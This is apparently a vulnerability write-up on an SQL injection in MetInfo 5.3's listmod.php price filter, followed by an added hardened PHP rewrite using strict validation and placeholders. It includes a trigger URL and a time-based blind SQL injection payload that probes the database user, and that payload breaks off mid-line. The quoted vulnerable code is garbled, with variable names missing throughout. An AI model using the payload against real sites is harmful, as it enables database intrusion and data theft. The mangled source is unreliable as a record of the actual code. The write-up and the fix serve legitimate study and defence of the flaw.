Look at lines 164-184 of MetInfo5.3/include/global/listmod.php:

```php
foreach( as  => $val2){
    $prices1 = "paraprice_".$val2['id'];
    $prices = $$prices1;
    var_dump($prices);
    if($prices){
        if(!strstr($prices, "-")){
            preg_match('/([0-9\.]+)/', $prices, );
             = [0];
             .= " and exists(select * from  where module=3 and .paraid='$val2[id]' and .listid=.id and .info > ) ";
             .= "&".$prices1."=".trim($prices);
        }else{
            //echo 3;
             = explode('-', $prices);
            preg_match('/([0-9\.]+)/', [1], );
             = [0];
             .= " and exists(select * from  where module=3 and .paraid='$val2[id]' and .listid=.id and .info > [0] and .info < ) ";
             .= "&".$prices1."=".trim($prices);
        }
    }
}
```

Here `$prices_sql[0]` is never initialised and is not wrapped in single quotes, which gives an SQL injection, although there is a logic check in front of it. First, there is a variable overwrite here, `$prices=$$prices1;`, and `paraprice_".$val2['id']` is under our control. You only need to construct a URL like the following:

```
?search=search&mdmendy=1&paraprice_14=tomato-xxxx&mdname=product
```

payload:

```
?search=search&mdmendy=1&paraprice_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000,
```
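As an added example (not MetInfo's code), here is what a hardened version of the same price-range filter looks like: the parameter is read from `$_GET` by name instead of through `$$prices1`, only `<number>` or `<number>-<number>` is accepted, and the SQL fragment carries placeholders with the values returned separately for binding, so nothing from the URL is concatenated into the query. The table and column names `met_plist`, `met_list`, `paraid`, `listid`, `info` are assumptions, and PHP 7.1+ is assumed.

```php
<?php
// Added example, not from MetInfo. Table/column names are assumed.

// Accept only "<num>" or "<min>-<max>" as a whole string; anything else is rejected.
// Returns [min, max] as floats (max null for a single bound), or null on bad input.
function parsePriceRange(string $raw): ?array
{
    if (!preg_match('/^\s*(\d+(?:\.\d+)?)\s*(?:-\s*(\d+(?:\.\d+)?)\s*)?$/', $raw, $m)) {
        return null;
    }
    $min = (float) $m[1];
    $max = isset($m[2]) && $m[2] !== '' ? (float) $m[2] : null; // trailing group absent when unmatched
    if ($max !== null && $max < $min) {
        return null;
    }
    return [$min, $max];
}

// Build the "exists(...)" fragment with placeholders and the values to bind.
// $get is the request array (e.g. $_GET); $paraId comes from the trusted parameter list,
// not from the URL, so the paraprice_<id> key is looked up explicitly.
function buildPriceFilter(array $get, int $paraId): array
{
    $key = 'paraprice_' . $paraId;                      // same naming as the original
    if (!isset($get[$key]) || !is_string($get[$key])) {
        return ['', []];
    }
    $range = parsePriceRange($get[$key]);
    if ($range === null) {
        return ['', []];                                // invalid input: filter is dropped
    }
    [$min, $max] = $range;
    $sql = ' and exists(select * from met_plist where module=3 and met_plist.paraid=? '
         . 'and met_plist.listid=met_list.id and met_plist.info > ?';
    $params = [$paraId, $min];
    if ($max !== null) {
        $sql .= ' and met_plist.info < ?';
        $params[] = $max;
    }
    return [$sql . ') ', $params];
}

// Constructed inputs: a valid range, the page's "tomato-xxxx", and a non-numeric string.
[$sql, $params] = buildPriceFilter(['paraprice_14' => '10-200'], 14);
echo $sql, "\n", json_encode($params), "\n";          // placeholders only; [14,10,200]
[$sql, $params] = buildPriceFilter(['paraprice_14' => 'tomato-xxxx'], 14);
var_dump($sql === '');                                 // true: rejected before any SQL is built
[$sql, $params] = buildPriceFilter(['paraprice_14' => '1) or 1=1'], 14);
var_dump($sql === '');                                 // true: same, nothing reaches the database
```

The fragment is meant to be passed to a prepared statement (PDO or mysqli) together with `$params`; the original code's `preg_match` on a substring after `explode('-')` is what let the unfiltered left-hand part through, and a whole-string match removes that path.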